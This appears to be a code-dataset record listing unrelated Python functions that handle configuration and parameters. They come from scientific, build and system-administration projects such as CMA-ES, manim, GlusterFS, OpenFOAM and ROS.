= sp.c1_sep = sp.cmu_sep = 0\r\n\r\n sp.damps = opts['CMA_dampfac'] * (0.5 +\r\n 0.5 * min([1, (sp.lam_mirr/(0.159*sp.popsize) - 1)**2])**1 +\r\n 2 * max([0, ((sp.mueff-1) / (N+1))**0.5 - 1]) + sp.cs\r\n )\r\n if 11 < 3:\r\n # this is worse than damps = 1 + sp.cs for the (1,10000)-ES on 40D parabolic ridge\r\n sp.damps = 0.3 + 2 * max([sp.mueff/sp.popsize, ((sp.mueff-1)/(N+1))**0.5 - 1]) + sp.cs\r\n if 11 < 3:\r\n # this does not work for lambda = 4*N^2 on the parabolic ridge\r\n sp.damps = opts['CMA_dampfac'] * (2 - 0*sp.lam_mirr/sp.popsize) * sp.mueff/sp.popsize + 0.3 + sp.cs # nicer future setting\r\n print('damps =', sp.damps)\r\n if 11 < 3:\r\n sp.damps = 10 * sp.damps # 1e99 # (1 + 2*max(0,sqrt((sp.mueff-1)/(N+1))-1)) + sp.cs;\r\n # sp.damps = 20 # 1. 
+ 20 * sp.cs**-1 # 1e99 # (1 + 2*max(0,sqrt((sp.mueff-1)/(N+1))-1)) + sp.cs;\r\n print('damps is %f' % (sp.damps))\r\n\r\n sp.cmean = float(opts['CMA_cmean'])\r\n # sp.kappa = 1 # 4-D, lam=16, rank1, kappa < 4 does not influence convergence rate\r\n # in larger dim it does, 15-D with defaults, kappa=8 factor 2\r\n if sp.cmean != 1:\r\n print(' cmean = %f' % (sp.cmean))\r\n\r\n if verbose:\r\n if not sp.CMA_on:\r\n print('covariance matrix adaptation turned off')\r\n if opts['CMA_mu'] != None:\r\n print('mu = %f' % (sp.mu_f))\r\n\r\n # return self # the constructor returns itself\r", "def setProperty(*args):", "def setProperty(*args):", "def setProperty(*args):", "def setProperty(*args):", "def setProperty(*args):", "def setOptions(args):\n obs_dir = PATH_TO_OBS + args.loc[0] + '/Drifter/'\n\n if args.drifter:\n # if drifter files are given...\n # use specified drifter files\n if args.debug:\n print 'looking for drifter directory...'\n print '\\tgathering all files...'\n\n matfiles = [obs_dir + file for file in args.drifter]\n\n for file in matfiles:\n if not osp.exists(file) or not osp.isfile(file):\n sys.exit('problem loading matlab drifter file {}'.format(file))\n\n if args.debug:\n print '-drifter file(s) successfully identified-'\n\n elif args.dir:\n # if just an fvcom directory is given...\n # gather all drifter files in region\n if args.debug:\n print 'looking for drifter directory...'\n\n if not osp.exists(obs_dir) or not osp.isdir(obs_dir):\n sys.exit('drifter directory not found.')\n elif args.debug:\n print 'drifter directory successfully found.'\n print '\\tgathering all files...'\n\n matfiles = [obs_dir + file for file in os.listdir(obs_dir)]\n if len(matfiles) == 0:\n sys.exit('no files found in drifter directory.')\n elif args.debug:\n print '\\tall drifter files found.'\n\n if args.debug:\n print 'looking for fvcom directory...'\n\n if args.bfric:\n path2sim = PATH_TO_SIM + 'BFRIC_' + args.bfric[0] + '/'\n\n # hacky fix to an odd bug\n if args.dir[0][-1] == ':':\n args.dir[0] = args.dir[0][:-1]\n\n # locate given fvcom file\n sim_path = path2sim + args.loc[0] + '/' + args.dir[0]\n\n if not osp.exists(sim_path):\n sys.exit('the directory {} could not be located.'.format(sim_path))\n elif not osp.isdir(sim_path):\n sys.exit('{} is not a directory.'.format(sim_path))\n elif args.debug:\n print '\\tfvcom directory found. \\n\\tloading nc file...'\n\n sim_path += '/output/subdomain_' + args.loc[0] + '1_0001.nc'\n if not osp.exists(sim_path) or not osp.isfile(sim_path):\n sys.exit('fvcom file not in directory.')\n elif args.debug:\n print '\\tfvcom file successfully located.'\n\n return args.loc[0], sim_path, args.dir[0], obs_dir, matfiles, args.tight", "def define_options(self):\n\n from clinica.engine.cmdparser import PIPELINE_CATEGORIES\n\n clinica_comp = self._args.add_argument_group(PIPELINE_CATEGORIES['CLINICA_COMPULSORY'])\n clinica_comp.add_argument(\"caps_directory\",\n help='Path to the CAPS directory.')\n clinica_comp.add_argument(\"list_bvalues\", type=str,\n help='String listing all the shells (i.e. 
the b-values) in the corrected DWI datasets comma separated (e.g, 0,300,700,2200)')\n # Optional arguments\n clinica_opt = self._args.add_argument_group(PIPELINE_CATEGORIES['CLINICA_OPTIONAL'])\n\n clinica_opt.add_argument(\"-wd\", \"--working_directory\",\n help='Temporary directory to store pipeline intermediate results')\n clinica_opt.add_argument(\"-np\", \"--n_procs\", type=int, default=4,\n help='Number of cores used to run in parallel')\n clinica_opt.add_argument(\"-tsv\", \"--subjects_sessions_tsv\",\n help='TSV file containing a list of subjects with their sessions.')", "def updateParameters(self):\n\n return", "def update_config_with_cli(args):\n parser = make_config_parser()\n default = parser[\"CLI\"]\n\n ## Update config\n global config\n\n # Handle the *_quality flags. These determine the section to read\n # and are stored in 'camera_config'. Note the highest resolution\n # passed as argument will be used.\n quality = _determine_quality(args)\n section = parser[quality if quality != constants.DEFAULT_QUALITY else \"CLI\"]\n\n # Loop over low quality for the keys, could be any quality really\n config.update({opt: section.getint(opt) for opt in parser[\"low_quality\"]})\n\n # The -r, --resolution flag overrides the *_quality flags\n if args.resolution is not None:\n if \",\" in args.resolution:\n height_str, width_str = args.resolution.split(\",\")\n height, width = int(height_str), int(width_str)\n else:\n height = int(args.resolution)\n width = int(16 * height / 9)\n config.update({\"pixel_height\": height, \"pixel_width\": width})\n\n # Handle the -c (--background_color) flag\n if args.background_color is not None:\n try:\n background_color = colour.Color(args.background_color)\n except AttributeError as err:\n logger.warning(\"Please use a valid color.\")\n logger.error(err)\n sys.exit(2)\n else:\n background_color = colour.Color(default[\"background_color\"])\n config[\"background_color\"] = background_color\n\n config[\"use_js_renderer\"] = args.use_js_renderer or default.getboolean(\n \"use_js_renderer\"\n )\n config[\"js_renderer_path\"] = args.js_renderer_path or default.get(\n \"js_renderer_path\"\n )\n\n # Set the rest of the frame properties\n config[\"frame_height\"] = 8.0\n config[\"frame_width\"] = (\n config[\"frame_height\"] * config[\"pixel_width\"] / config[\"pixel_height\"]\n )\n config[\"frame_y_radius\"] = config[\"frame_height\"] / 2\n config[\"frame_x_radius\"] = config[\"frame_width\"] / 2\n config[\"top\"] = config[\"frame_y_radius\"] * constants.UP\n config[\"bottom\"] = config[\"frame_y_radius\"] * constants.DOWN\n config[\"left_side\"] = config[\"frame_x_radius\"] * constants.LEFT\n config[\"right_side\"] = config[\"frame_x_radius\"] * constants.RIGHT\n\n # Handle the --tex_template flag, if the flag is absent read it from the config.\n if args.tex_template:\n tex_fn = os.path.expanduser(args.tex_template)\n else:\n tex_fn = default[\"tex_template\"] if default[\"tex_template\"] != \"\" else None\n\n if tex_fn is not None and not os.access(tex_fn, os.R_OK):\n # custom template not available, fallback to default\n logger.warning(\n f\"Custom TeX template {tex_fn} not found or not readable. 
\"\n \"Falling back to the default template.\"\n )\n tex_fn = None\n config[\"tex_template_file\"] = tex_fn\n config[\"tex_template\"] = (\n TexTemplateFromFile(filename=tex_fn) if tex_fn is not None else TexTemplate()\n )\n\n ## Update file_writer_config\n fw_config = {}\n\n if config[\"use_js_renderer\"]:\n fw_config[\"disable_caching\"] = True\n\n if not hasattr(args, \"subcommands\"):\n fw_config[\"input_file\"] = args.file if args.file else \"\"\n fw_config[\"scene_names\"] = (\n args.scene_names if args.scene_names is not None else []\n )\n fw_config[\"output_file\"] = args.output_file if args.output_file else \"\"\n\n # Note ConfigParser options are all strings and each needs to be converted\n # to the appropriate type.\n for boolean_opt in [\n \"preview\",\n \"show_in_file_browser\",\n \"leave_progress_bars\",\n \"write_to_movie\",\n \"save_last_frame\",\n \"save_pngs\",\n \"save_as_gif\",\n \"write_all\",\n \"disable_caching\",\n \"flush_cache\",\n \"log_to_file\",\n ]:\n attr = getattr(args, boolean_opt)\n fw_config[boolean_opt] = (\n default.getboolean(boolean_opt) if attr is None else attr\n )\n # for str_opt in ['media_dir', 'video_dir', 'tex_dir', 'text_dir']:\n for str_opt in [\"media_dir\"]:\n attr = getattr(args, str_opt)\n fw_config[str_opt] = os.path.relpath(default[str_opt]) if attr is None else attr\n attr = getattr(args, \"log_dir\")\n fw_config[\"log_dir\"] = (\n os.path.join(fw_config[\"media_dir\"], default[\"log_dir\"])\n if attr is None\n else attr\n )\n dir_names = {\n \"video_dir\": \"videos\",\n \"images_dir\": \"images\",\n \"tex_dir\": \"Tex\",\n \"text_dir\": \"texts\",\n }\n for name in dir_names:\n fw_config[name] = os.path.join(fw_config[\"media_dir\"], dir_names[name])\n\n # the --custom_folders flag overrides the default folder structure with the\n # custom folders defined in the [custom_folders] section of the config file\n fw_config[\"custom_folders\"] = args.custom_folders\n if fw_config[\"custom_folders\"]:\n fw_config[\"media_dir\"] = parser[\"custom_folders\"].get(\"media_dir\")\n for opt in [\"video_dir\", \"images_dir\", \"tex_dir\", \"text_dir\"]:\n fw_config[opt] = parser[\"custom_folders\"].get(opt)\n\n # Handle the -s (--save_last_frame) flag: invalidate the -w flag\n # At this point the save_last_frame option has already been set by\n # both CLI and the cfg file, so read the config dict directly\n if fw_config[\"save_last_frame\"]:\n fw_config[\"write_to_movie\"] = False\n\n # Handle the -t (--transparent) flag. This flag determines which\n # section to use from the .cfg file.\n section = parser[\"transparent\"] if args.transparent else default\n for opt in [\"png_mode\", \"movie_file_extension\", \"background_opacity\"]:\n fw_config[opt] = section[opt]\n\n # Handle the -n flag. Read first from the cfg and then override with CLI.\n # These two are integers -- use getint()\n for opt in [\"from_animation_number\", \"upto_animation_number\"]:\n fw_config[opt] = default.getint(opt)\n if fw_config[\"upto_animation_number\"] == -1:\n fw_config[\"upto_animation_number\"] = float(\"inf\")\n nflag = args.from_animation_number\n if nflag is not None:\n if \",\" in nflag:\n start, end = nflag.split(\",\")\n fw_config[\"from_animation_number\"] = int(start)\n fw_config[\"upto_animation_number\"] = int(end)\n else:\n fw_config[\"from_animation_number\"] = int(nflag)\n\n # Handle the --dry_run flag. This flag determines which section\n # to use from the .cfg file. 
All options involved are boolean.\n # Note this overrides the flags -w, -s, -a, -g, and -i.\n if args.dry_run:\n for opt in [\n \"write_to_movie\",\n \"save_last_frame\",\n \"save_pngs\",\n \"save_as_gif\",\n \"write_all\",\n ]:\n fw_config[opt] = parser[\"dry_run\"].getboolean(opt)\n if not fw_config[\"write_to_movie\"]:\n fw_config[\"disable_caching\"] = True\n # Read in the streaming section -- all values are strings\n fw_config[\"streaming\"] = {\n opt: parser[\"streaming\"][opt]\n for opt in [\n \"live_stream_name\",\n \"twitch_stream_key\",\n \"streaming_protocol\",\n \"streaming_ip\",\n \"streaming_protocol\",\n \"streaming_client\",\n \"streaming_port\",\n \"streaming_port\",\n \"streaming_console_banner\",\n ]\n }\n\n # For internal use (no CLI flag)\n fw_config[\"skip_animations\"] = fw_config[\"save_last_frame\"]\n fw_config[\"max_files_cached\"] = default.getint(\"max_files_cached\")\n if fw_config[\"max_files_cached\"] == -1:\n fw_config[\"max_files_cached\"] = float(\"inf\")\n # Parse the verbosity flag to read in the log level\n verbosity = getattr(args, \"verbosity\")\n verbosity = default[\"verbosity\"] if verbosity is None else verbosity\n fw_config[\"verbosity\"] = verbosity\n logger.setLevel(verbosity)\n\n # Parse the ffmpeg log level in the config\n ffmpeg_loglevel = parser[\"ffmpeg\"].get(\"loglevel\", None)\n fw_config[\"ffmpeg_loglevel\"] = (\n constants.FFMPEG_VERBOSITY_MAP[verbosity]\n if ffmpeg_loglevel is None\n else ffmpeg_loglevel\n )\n\n # Parse the progress_bar flag\n progress_bar = getattr(args, \"progress_bar\")\n if progress_bar is None:\n progress_bar = default.getboolean(\"progress_bar\")\n fw_config[\"progress_bar\"] = progress_bar\n\n global file_writer_config\n file_writer_config.update(fw_config)", "def set_volume_options(cd):\n\n try:\n vol_name = cd[\"vol_name\"]\n auth_allow = cd[\"auth_allow\"]\n auth_reject = cd[\"auth_reject\"]\n if \"nfs_disable\" in cd:\n nfs_disable = cd[\"nfs_disable\"]\n else:\n nfs_disable = False\n if \"enable_worm\" in cd:\n enable_worm = cd[\"enable_worm\"]\n else:\n enable_worm = False\n readonly = cd[\"readonly\"]\n nfs_volume_access = cd[\"nfs_volume_access\"]\n\n vol_info_dict, err = get_basic_volume_info(vol_name)\n if err:\n raise Exception(err)\n\n # set defaults first\n _auth_allow = \"*\"\n _auth_reject = \"NONE\"\n _readonly = \"off\"\n _nfs_disable = False\n _enable_worm = False\n _nfs_volume_access = \"read-write\"\n\n if \"options\" in vol_info_dict:\n for option in vol_info_dict[\"options\"]:\n if option[\"name\"] == \"auth.allow\":\n _auth_allow = option[\"value\"]\n if option[\"name\"] == \"auth.reject\":\n _auth_reject = option[\"value\"]\n if option[\"name\"] == \"nfs.disable\":\n if option[\"value\"].lower() == \"off\":\n _nfs_disable = False\n else:\n _nfs_disable = True\n if option[\"name\"] == \"nfs.volume-access\":\n _nfs_volume_access = option[\"value\"]\n if option[\"name\"] == \"features.read-only\":\n _readonly = option[\"value\"]\n if option[\"name\"] == \"features.worm\":\n if option[\"value\"].lower() == \"enable\":\n _enable_worm = True\n else:\n _enable_worm = False\n\n # Now, for each option that has changed, set the parameter\n ret_list = []\n\n if _auth_allow != auth_allow:\n d, err = _set_volume_option(vol_name, \"auth.allow\", auth_allow)\n if err:\n raise Exception(err)\n d['audit_str'] = \"Setting option for permitted access IP addresses for %s to \\'%s\\'\" % (\n vol_name, auth_allow)\n ret_list.append(d)\n\n if _auth_reject != auth_reject:\n d, err = 
_set_volume_option(vol_name, \"auth.reject\", auth_reject)\n if err:\n raise Exception(err)\n d['audit_str'] = \"Setting option for denied access IP addresses for %s to \\'%s\\'\" % (\n vol_name, auth_reject)\n ret_list.append(d)\n\n if _readonly != readonly:\n d, err = _set_volume_option(\n vol_name, \"features.read-only\", readonly)\n if err:\n raise Exception(err)\n d['audit_str'] = \"Setting readonly mount access(for all access methods) for %s to \\'%s\\'\" % (\n vol_name, readonly)\n ret_list.append(d)\n\n if readonly == \"off\":\n\n # All the rest applies only if volume access is read-write\n if _nfs_disable != nfs_disable:\n if nfs_disable:\n p = \"on\"\n else:\n p = \"off\"\n d, err = _set_volume_option(vol_name, \"nfs.disable\", p)\n if err:\n raise Exception(err)\n d['audit_str'] = \"Setting NFS disable for %s to \\'%s\\'\" % (\n vol_name, p)\n ret_list.append(d)\n\n if not nfs_disable:\n # print \"in\"\n if nfs_volume_access and _nfs_volume_access != nfs_volume_access:\n d, err = _set_volume_option(\n vol_name, \"nfs.volume-access\", nfs_volume_access)\n if err:\n raise Exception(err)\n d['audit_str'] = \"Setting NFS access type for %s to \\'%s\\'\" % (\n vol_name, nfs_volume_access)\n ret_list.append(d)\n\n if _enable_worm != enable_worm:\n if enable_worm:\n p = \"enable\"\n else:\n p = \"disable\"\n d, err = _set_volume_option(vol_name, \"features.worm\", p)\n if err:\n raise Exception(err)\n d['audit_str'] = \"Setting feature WORM for %s to \\'%s\\'\" % (\n vol_name, p)\n ret_list.append(d)\n\n except Exception, e:\n return None, 'Error setting volume options: %s' % str(e)\n else:\n return ret_list, None", "def set_params(self, **kwargs):\n ...", "def main(docopt_args):\n\n # Notice, no checking for -h, or --help is written here.\n logger = logging.getLogger()\n logger.debug('Docopt Dictionary: %s', pp.pformat(args))\n # docopt will automagically check for it and use your usage string.\n\n if docopt_args['init']:\n get_switchports_d(docopt_args['<initcsv>'],\n docopt_args['--CONFDIR'],\n docopt_args['--CONFILE']\n )\n elif docopt_args['mark']:\n mark_switchports_final(docopt_args['<finalcsv>'],\n docopt_args['--CONFDIR'],\n docopt_args['--CONFILE'])\n elif docopt_args['move']:\n move_interfaces( docopt_args['--RUNDIR'],\n docopt_args['--RUNSHEET'],\n docopt_args['--CONFDIR'],\n docopt_args['--CONFILE'],\n docopt_args['<source>'],\n docopt_args['<destination>'])\n elif docopt_args['update']:\n update_switchports( docopt_args['<updatecsv>'],\n docopt_args['--CONFDIR'],\n docopt_args['--CONFILE'],\n docopt_args['--UPDATEDIR'],\n docopt_args['--UPDATEFILE'])\n elif docopt_args['final']:\n finalize( docopt_args['--RUNDIR'],\n docopt_args['--RUNSHEET'],\n docopt_args['--CONFDIR'],\n docopt_args['--CONFILE'],\n docopt_args['<source>'],\n docopt_args['<destination>'])\n\n # load_switchports()", "def RPC_DigitizationToolCommonCfg(flags, name=\"RpcDigitizationTool\", **kwargs):\n from MuonConfig.MuonCondAlgConfig import RpcCondDbAlgCfg # MT-safe conditions access\n acc = RpcCondDbAlgCfg(flags)\n if flags.Digitization.DoXingByXingPileUp:\n kwargs.setdefault(\"FirstXing\", RPC_FirstXing())\n kwargs.setdefault(\"LastXing\", RPC_LastXing())\n kwargs.setdefault(\"OutputObjectName\", \"RPC_DIGITS\")\n if flags.Digitization.PileUpPremixing:\n kwargs.setdefault(\"OutputSDOName\", flags.Overlay.BkgPrefix + \"RPC_SDO\")\n else:\n kwargs.setdefault(\"OutputSDOName\", \"RPC_SDO\")\n # config\n kwargs.setdefault(\"DeadTime\", 100)\n kwargs.setdefault(\"PatchForRpcTime\", True)\n # 
kwargs.setdefault(\"PatchForRpcTimeShift\", 9.6875)\n kwargs.setdefault(\"PatchForRpcTimeShift\", 12.5)\n kwargs.setdefault(\"turnON_efficiency\", True)\n kwargs.setdefault(\"turnON_clustersize\", True)\n kwargs.setdefault(\"testbeam_clustersize\", 0)\n kwargs.setdefault(\"ClusterSize1_2uncorr\", 0)\n kwargs.setdefault(\"CutProjectedTracks\", 100)\n kwargs.setdefault(\"RPCInfoFromDb\", True)\n kwargs.setdefault(\"Efficiency_fromCOOL\", True)\n kwargs.setdefault(\"EfficiencyPatchForBMShighEta\", False)\n kwargs.setdefault(\"ClusterSize_fromCOOL\", True)\n kwargs.setdefault(\"DumpFromDbFirst\", False)\n kwargs.setdefault(\"PanelId_OFF_fromlist\", False)\n kwargs.setdefault(\"PanelId_OK_fromlist\", False)\n kwargs.setdefault(\"IgnoreRunDependentConfig\", False)\n kwargs.setdefault(\"PrintCalibrationVector\",False )\n kwargs.setdefault(\"PhiAndEtaEff_A\",[0.938, 0.938, 0.938, 0.938, 0.938, 0.938, 0.938, 0.938, 0.938])\n kwargs.setdefault(\"OnlyPhiEff_A\" ,[0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022])\n kwargs.setdefault(\"OnlyEtaEff_A\" ,[0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022])\n kwargs.setdefault(\"PhiAndEtaEff_C\",[0.938, 0.938, 0.938, 0.938, 0.938, 0.938, 0.938, 0.938, 0.938])\n kwargs.setdefault(\"OnlyPhiEff_C\" ,[0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022])\n kwargs.setdefault(\"OnlyEtaEff_C\" ,[0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022, 0.022])\n kwargs.setdefault(\"FracClusterSize1_A\", [0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664])\n kwargs.setdefault(\"FracClusterSize2_A\", [0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986])\n kwargs.setdefault(\"FracClusterSizeTail_A\",[0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035 ])\n kwargs.setdefault(\"MeanClusterSizeTail_A\",[0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598])\n kwargs.setdefault(\"FracClusterSize1_C\", [0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664, 0.609664])\n kwargs.setdefault(\"FracClusterSize2_C\", [0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986, 0.259986])\n kwargs.setdefault(\"FracClusterSizeTail_C\",[0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035, 0.13035 ])\n kwargs.setdefault(\"MeanClusterSizeTail_C\",[0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598, 0.548598])\n RpcDigitizationTool = CompFactory.RpcDigitizationTool\n acc.setPrivateTools(RpcDigitizationTool(name, **kwargs))\n return acc", "def runCase2(foamCase, baseCase, parameters, volumeParameters, controlParameters, options=dict(parallel=False, overwrite=True), verbose=True):\n\n status = checkIfExist(foamCase)\n if status != 
2:\n #print(foamCase + ' already exists. Continue with next case ...' )\n if status ==1:\n return [] # for when the case is still running\n else:\n return [] # for when the case has finished running\n else: \n print('\\n==============================================================\\nRunning ' + foamCase + '\\n==============================================================\\n')\n\n createCase(foamCase, baseCase)\n # get old parameters. \n parameterFile = 'parameters'\n #for parameter in parameters.keys():\n # currentValue = readInput(parameterFile, parameter, foamCase)\n # parameters[parameter]=currentValue\n\n # Values to be changed\n if verbose:\n print('\\n\\nChanging section\\n\\n\\t\\tGeometry') \n for parameter in parameters.keys():\n changeInput(parameter, parameters[parameter], parameterFile, foamCase, verbose=verbose)\n\n if verbose:\n print('\\n\\t\\tVolumetric flow parameters')\n for volumeParameter in volumeParameters.keys():\n writeParameter = volumeParameter.replace('Q', 'U')\n if volumeParameter=='QNozzleIn':\n velocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2], angle = 5)\n # immediately write to the spraycloudproperties file\n particleVelocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2], angle = 20)\n changeInput('Upnozzle', particleVelocity.strip('uniform '), 'sprayCloudProperties', foamCase, verbose=verbose) \n elif volumeParameter=='QShieldIn':\n velocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2])\n elif volumeParameter=='QShieldOut':\n velocity = Q2Vel(volumeParameters[volumeParameter][0], volumeParameters[volumeParameter][1], volumeParameters[volumeParameter][2], direction=[0, 1, 0])\n changeInput(volumeParameter, volumeParameters[volumeParameter][0], parameterFile, foamCase, verbose=verbose) # for visual interpretation in parameters file\n changeInput(writeParameter, velocity, 'U', foamCase, verbose=verbose) # for the inflow condition\n \n if verbose:\n print('\\n\\t\\tControl parameters ')\n for controlParameter in controlParameters.keys():\n changeInput(controlParameter, controlParameters[controlParameter], 'controlDict', foamCase, verbose=verbose)\n \n if verbose:\n print('\\n\\t\\tRunning section')\n #steps \n steps =[\n 'blockMesh',\n 'extrudeMesh',\n 'changeDictionary',\n 'createPatch',\n 'renumberMesh',\n 'checkMesh',\n 'prepare',\n 'run',\n ]\n \n checkResult = checkDicts(steps, foamCase=foamCase)\n if checkResult==1:\n print('\\n\\t\\tContinue to the next case... 
\\n')\n return 2\n else:\n solver = readInput('controlDict', 'application' , foamCase=foamCase)\n oldPIDs = getSolverPIDs(solver)\n runFile = foamCase + '/Allrun.sh'\n createOptimizeRunFile(runFile, steps, options, parameters)\n if verbose:\n print('\\t\\tRunning....')\n os.system(runFile + ' &') # actually run the file\n newPIDs = getSolverPIDs(solver)\n PIDs = []\n for pid in newPIDs:\n if pid not in oldPIDs:\n PIDs.append(pid)\n return PIDs", "def do_set(self,args):\n self.bindings.update(parse_kvs(re.split(' +',args)))\n print_bindings(self.bindings)", "def testcliparams(c, name=\"def\"):\n print(name)", "def update_parameters(self):\n self.alignment_factor = rospy.get_param('/dyn_reconf/alignment_factor')\n self.cohesion_factor = rospy.get_param('/dyn_reconf/cohesion_factor')\n self.separation_factor = rospy.get_param('/dyn_reconf/separation_factor')\n self.avoid_factor = rospy.get_param('/dyn_reconf/avoid_factor')\n self.max_speed = rospy.get_param('/dyn_reconf/max_speed')\n self.max_force = rospy.get_param('/dyn_reconf/max_force')\n self.friction = rospy.get_param('/dyn_reconf/friction')\n self.crowd_radius = rospy.get_param('/dyn_reconf/crowd_radius')\n self.search_radius = rospy.get_param('/dyn_reconf/search_radius')\n\n rospy.loginfo(rospy.get_caller_id() + \" -> Parameters updated\")\n if DEBUG:\n print('alignment_factor: ', self.alignment_factor)\n print('cohesion_factor: ', self.cohesion_factor)\n print('separation_factor: ', self.separation_factor)\n print('avoid_factor: ', self.avoid_factor)\n print('max_speed: ', self.max_speed)\n print('max_force: ', self.max_force)\n print('friction: ', self.friction)\n print('crowd_radius: ', self.crowd_radius)\n print('search_radius: ', self.search_radius)", "def tcset_api(c_id, options):\n tcset_options = []\n delay_set = False\n\n # settings with units\n if 'rate' in options and options['rate'] >= 0:\n if 'rate_unit' in options and options['rate_unit'] in ['Kbps', 'Mbps', 'Gbps']:\n rate_unit = options['rate_unit']\n else:\n rate_unit = 'Mbps'\n tcset_options.append('--rate ' + str(options['rate']) + rate_unit)\n\n if 'delay' in options and options['delay'] >= 0:\n delay_set = True\n if 'delay_unit' in options and options['delay_unit'] in ['usec', 'msec', 'sec', 'min']:\n delay_unit = options['delay_unit']\n else:\n delay_unit = 'msec'\n tcset_options.append('--delay ' + str(options['delay']) + delay_unit)\n\n if 'delay-distro' in options:\n \n if 'delay-distro_unit' in options and options['delay-distro_unit'] in ['usec', 'msec', 'sec', 'min']:\n delay_dist_unit = options['delay-distro_unit']\n else:\n delay_dist_unit = 'msec'\n\n if not delay_set:\n return \"Error: delay distribution can only be set with the delay\", 400\n tcset_options.append('--delay-distro ' + str(options['delay-distro']) + delay_dist_unit)\n\n # settings without units (percentage)\n if 'loss' in options and 0 <= options['loss'] <= 100: # | ||\n tcset_options.append('--loss ' + str(options['loss']) + '%') # | |_\n\n if 'corrupt' in options and 0 <= options['corrupt'] <= 100:\n tcset_options.append('--corrupt ' + str(options['corrupt']) + '%')\n\n if 'reorder' in options and 0 <= options['reorder'] <= 100:\n if not delay_set:\n return \"Error: reordering can only be set with the delay\", 400\n tcset_options.append('--reordering ' + str(options['reorder']) + '%')\n\n if 'duplicate' in options and 0 <= options['duplicate'] <= 100:\n tcset_options.append('--duplicate ' + str(options['duplicate']) + '%')\n\n if not len(tcset_options):\n return 'Error: no settings were 
given', 400\n\n # print('[ TCSET OPTIONS ]', tcset_options, sep='\\n', end='\\n')\n\n # print('[ c_id ]', c_id, sep='\\n', end='\\n')\n\n cmd = 'tcdel --docker --all {0};\\ntcset --docker {1} {0}'.format(c_id, ' '.join(tcset_options))\n\n # print('[ CMD ]', cmd, sep='\\n', end='\\n')\n\n\n tcset_process = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, universal_newlines=True,\n timeout=25)\n\n return_code = tcset_process.returncode\n stdout = tcset_process.stdout\n stderr = tcset_process.stderr\n\n # print('[ returncode ] ', return_code)\n # print('[ stdout ]', stdout, sep='\\n')\n # print('[ stderr ]', stderr, sep='\\n')\n\n # return redirect(url_for('show_container', c_id=c_id))\n\n return return_code", "def configure(self,user_input):\n if user_input==\"configure formal\":\n self.configure_formality(True)\n elif user_input==\"configure informal\":\n self.configure_formality(False)\n elif user_input==\"configure delay\":\n self.configure_delay(2)\n elif user_input==\"configure no delay\":\n self.configure_delay(0)\n '''\n #%%\n '''", "def set_params(self, **kargs):\n\n # may further modify parameters manually\n if len(kargs) > 0:\n for key in kargs:\n if key in self.params[self.profile].keys():\n self.params[self.profile][key] = kargs[key]\n else:\n print '%s not a standard key. Will not be used.' % (key)\n \n self.pathout = self.params[self.profile]['pathout']\n self.chans = self.params[self.profile]['chans']\n self.dmarr = self.params[self.profile]['dmarr']\n self.pulsewidth = self.params[self.profile]['pulsewidth'] * n.ones(len(self.chans))\n self.approxuvw = self.params[self.profile]['approxuvw']\n self.beam_params = self.params[self.profile]['beam_params']\n self.long = self.params[self.profile]['long']\n self.lat = self.params[self.profile]['lat']", "def run(self, args=[]):\n # Assert correct configuration.\n assert self.c.cbb.config, 'An empty configuration was specified.'\n assert self.c.cbb.builddir, 'A build directory name must be specified.'\n\n # Load properties from the commit being processed. This requires both a\n # repository and revision to proceed.\n repository = self.m.properties.get('repository')\n revision = self.m.properties.get('revision')\n if repository and revision:\n # Pull more information from the commit if it came from certain known\n # repositories.\n if (self.c.use_chrome_version and\n self.check_repository('chromium', repository)):\n # If our change comes from a Chromium repository, add the\n # '--chrome_version' flag.\n self.c.cbb.chrome_version = self.m.properties['revision']\n if (self.c.read_cros_manifest and\n self.check_repository('cros_manifest', repository)):\n # This change comes from a manifest repository. 
